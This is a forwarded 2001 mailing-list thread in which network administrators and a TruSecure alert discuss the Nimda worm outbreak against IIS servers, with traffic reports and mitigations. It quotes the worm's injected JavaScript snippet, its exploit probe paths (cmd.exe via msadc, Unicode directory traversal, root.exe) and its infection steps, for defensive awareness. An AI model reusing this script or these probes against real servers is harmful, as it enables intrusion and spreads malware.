Here's one from a thread on nanog
HTH,
Geoff
----- Original Message -----
From: "Jim Olsen" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 11:03 AM
Subject: Re: FW: Worm probes
>
> This is the information i've collected thus far on W32.nimda:
>
> W32.nimda is NOT a code red variant, and the people who referring to it as
> "Code Blue" were mistaken...
>
> The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It
uses
> several vulnerabilities in Windows NT and 2000 server's to infect a
server,
> and also employ's email and web site mobile code to infect Windows
> 9x/ME/NT/2k boxes.
>
> During the initial infection of a server, the worm does the following:
> - download a file named "admin.dll" via tftp from the system that
is
> trying to infect the target
> - add the guest account to the local administrators group and
> activates the account
> - makes sure c$ is shared out
> - copies itself to c, d, and e drives
> - tries to mail itself to email addresses that it discovers on the
> server
> - creates a file named readme.exe, which is used in the mobile
code
> inserted on the web sites below
> - add this string to the web pages found on the server:
> <html><script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script></html>
> - scans for and infects other vulnerable IIS servers
> - goes through all shared directories and puts sample.nws,
> sample.eml, desktop.eml, desktop.nws in each directory. these are eml
> messages with copies of itself (readme.exe) autoloaded by the mobile html
> code mentioned above.
> - goes through all shared directories and puts riched20.dll in
each
> directory, which is a trogan dll version of W32.nimda that is meant to
> infect people running notepad/wordpad in that directory.
> - puts a trojan mmc.exe in the winnt directory that is a copy of
> itself in the above "readme.exe" format (win2000 only)
>
> If a user views a web site that is hosted on an infected server, the
> following happens:
> - upon viewing an infected page, the mobile code extracts to
> readme.exe and starts in windows media player (without user intervention)
> - the user's machine becomes infected with W32.nimda at this point
> and time
> - the worm starts scanning for other vulnerable IIS servers
> - the worm emails itself to everyone on the user's address book
> - goes through all shared directories and puts sample.nws,
> sample.eml, desktop.eml, desktop.nws in each directory. these are eml
> messages with copies of itself (readme.exe) autoloaded by the mobile html
> code mentioned above.
> - goes through all shared directories and puts riched20.dll in
each
> directory, which is a trogjan dll version of W32.nimda that is meant to
> infect people running notepad/wordpad in that directory.
> - puts a trojan mmc.exe in the winnt directory that is a copy of
> itself in the above "readme.exe" format (win2000 only)
>
> It us unknown to me what happens (at this point in time) if a user opens
an
> attachment that is sent from an infected site. It is possible that it
could
> automatically infect the user's computer using the same methods mentioned
> above.
>
> EVERYONE who uses internet explorer to browse the internet should probably
do
> one of two things to stop from being automatically infected by W32.nimda
(i
> have not tested whether or not turning off javascript fixes the problem):
> o) don't browse web pages until microsoft releases a patch
> o) turn OFF javascript
>
> EVERYONE who uses outlook/outlook express should, at the very least, not
open
> any attachments that they are not expecting. Turning off auto-preview
might
> be a good idea as well.
>
> Slashdot has an article discussing this:
> http://slashdot.org/articles/01/09/18/151203.shtml
>
> On Tuesday 18 September 2001 11:33, Braun, Mike wrote:
> > I received this warning from TruSecure regarding the latest worm attack.
> >
> > Mike Braun
> > First American CREDCO
> >
> > -----Original Message-----
> > TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm
> >
> > Date: September 18, 2001
> > Time: 1000 EDT
> >
> > RISK INDICES:
> >
> > Initial Assessment: RED HOT
> >
> > Threat: VERY HIGH, (rapidly increasing)
> >
> > Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
> > 5.0, and internal networks.
> >
> > Cost: High, command execution is possible
> >
> > Vulnerable Systems: IIS 4.0 and 5.0
> >
> > SUMMARY:
> > A new IIS worm is spreading rapidly. Its working name is Nimda:
> > W32.nimda.a.mm
> >
> > It started about 9am eastern time today, Tuesday,September 18, 2001,
> > Mulitple sensors world-wide run by TruSecure corporation are getting
> > multiple hundred hits per hour. And began at 9:08am am.
> >
> > The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
> > multiple vulnerabilities including:
> >
> > Almost all are get scripts, and a get msadc (cmd.exe)
> > get_mem_bin
> > vti_bin owssvr.dll
> > Root.exe
> > CMD.EXE
> > ../ (Unicode)
> > Getadmin.dll
> > Default.IDA
> > /Msoffice/ cltreq.asp
> >
> > This is not code red or a code red variant.
> >
> > The worm, like code red attempts to infect its local sub net first,
> > then spreads beyond the local address space.
> >
> > It is spreading very rapidly.
> >
> > TruSecure believes that this worm will infect any IIS 4 and IIS 5
> > box with well known vulnerabilities. We believe that there are
> > nearly 1Million such machines currently exposed to the Internet.
> >
> > Risks Indices:
> > Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
> > Internet Web server hosts: TruSecure process and essential
> > configurations should generally be protective. The vulnerability
> > prevalence world-wide is very high
> >
> > Threat - VERY HIGH and Growing The rate of growth and spread is
> > exceedingly rapid - significantly faster than any worm to date and
> > significantly faster than any variant of Code red.
> >
> > Cost -- Unknown, probably moderate per infected system.
> >
> >
> > The worm itself is a file called
> > README.EXE, or ADMIN.DLL
> > a 56K file which is advertised as an audio xwave mime type file.
> >
> > Other RISKS:
> > There is risk of DOS of network segments by traffic volume alone
> > There is large risk of successful attack to both Internet exposed IIS
> > boxes and to developer and Intranet boxes inside of corporations.
> >
> > Judging by the Code Red II experience, we expect many subtle routes
> > of infection leading to inside corporate infections.
> >
> > We cannot discount the coincidence of the date and time of release,
> > exactly one week to (probably to the minute) as the World Trade
> > Center attack .
> >
> >
> > REPLICATION:
> > There are at least three mechanisms of spread:
> > The worm seems to spread both by a direct IIS across Internet (IP
> > spread)
> > It probably also spreads by local shares. (this is not known for
> > sure at this time)
> > There is also an email vector where README.EXE is sent via email to
> > numerous accounts.
> >
> > Mitigations
> > TruSecure essential practices should work.
> > Block all email with EXE attachments
> > Filter for README.EXE
> > Make sure IIS boxes are well patched and hardened, or removed from
> > both the Internet and Intranets.
> > Make sure any developer computing platforms are not running IIS of
> > any version (many do so by default if either.
> > Disconnect mail from the Internet
> > Advise users not to double click on any unexpected attachments.
> > Update anti-virus when your vendor has the signature.
> >
> >
> > -----Original Message-----
> > From: Bryan Heitman [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 8:22 AM
> > To: [EMAIL PROTECTED]
> > Subject: Re: Worm probes
> >
> >
> >
> > We're also seeing a large increase in this activity. This seems to be
more
> > severe than the first time. Have an additional 30 to 40 meg inbound
from
> > this.
> >
> > Best regards,
> >
> >
> > Bryan Heitman
> > CommuniTech.Net, Inc.
> > ----- Original Message -----
> > From: <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Tuesday, September 18, 2001 10:05 AM
> > Subject: Re: Worm probes
> >
> > > ugh...this is way more impact...a 128k ISDN customer running an
NT/Win2k
> > > box is at 100% BW, and my 2x T1's are at about 2x normal traffic for
this
> > > time of day, although still well short of capacity...apache server
> > > processor load is WAY up just from the requests, and the logs are
growing
> > > like mad.
> > >
> > > On Tue, 18 Sep 2001, deeann mikula wrote:
> > > > On Tue, 18 Sep 2001, ravi pina wrote:
> > > > > On Tue, Sep 18, 2001 at 09:54:31AM -0400, [EMAIL PROTECTED] said at
one
> >
> > point in time:
> > > > > > Has anyone else been seeing a dramatic increase in /scripts/..
NT
> >
> > worm
> >
> > > > > > probes this morning? We're seeing about 8000/second, starting
> >
> > around 9:15
> >
> > > > > > Eastern time, to and from a wide variety of addresses.
> > > > >
> > > > > affirmative. i just looked at my logs, and it looks like
> > > > > each probe tries a bunch of things. i haven't seen much
> > > > > on the lists, but i'm looking right now.
> > > >
> > > > i'm pretty sure that the worm's attack phase starts on the 20th
(which
> > > > of course, depends upon a correctly set system clock) and also that
> > > > attempting to execute something like /scripts/root.ext/c++ something
> > > > is involved.
> > > >
> > > > i think that cert's website would be a good place to look. i'm
*not*
> > > > a security/virus chick, but i did host a talk by marty linder of
cert
> > > > where he discected code red's activity and presented a summary.
> > > >
> > > > cert is of course, http://www.cert.org.
> > > >
> > > >
> > > > deeann m.m. mikula
> > > >
> > > > director of operations
> > > > telerama public access internet
> > > > http://www.telerama.com
> > > > 1.877.688.3200
> > >
> > > James Smallacombe PlantageNet, Inc. CEO and Janitor
> > > [EMAIL PROTECTED] http://3.am
> > >
=========================================================================
> >
> > "MMS <firstam.com>" made the following
> > annotations on 09/18/01 08:34:15
>
> --------------------------------------------------------------------------
-
> >--- "THIS E-MAIL MESSAGE AND ANY FILES TRANSMITTED HEREWITH, ARE INTENDED
> > SOLELY FOR THE USE OF THE INDIVIDUAL(S) ADDRESSED AND MAY CONTAIN
> > CONFIDENTIAL, PROPRIETARY OR PRIVILEGED INFORMATION. IF YOU ARE NOT THE
> > ADDRESSEE INDICATED IN THIS MESSAGE (OR RESPONSIBLE FOR DELIVERY OF THIS
> > MESSAGE TO SUCH PERSON) YOU MAY NOT REVIEW, USE, DISCLOSE OR DISTRIBUTE
> > THIS MESSAGE OR ANY FILES TRANSMITTED HEREWITH. IF YOU RECEIVE THIS
> > MESSAGE IN ERROR, PLEASE CONTACT THE SENDER BY REPLY E-MAIL AND DELETE
THIS
> > MESSAGE AND ALL COPIES OF IT FROM YOUR SYSTEM."
> >
> >
===========================================================================
> >===
>
> --
> "Computer games don't affect kids, I mean if Pacman affected us as kids,
> we'd all be running around in darkened rooms, munching pills, and
listening
> to repetitive music." ~unknown
> ****
> Jim Olsen
> Systems Administrator
> CyberJunkees
> ****
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
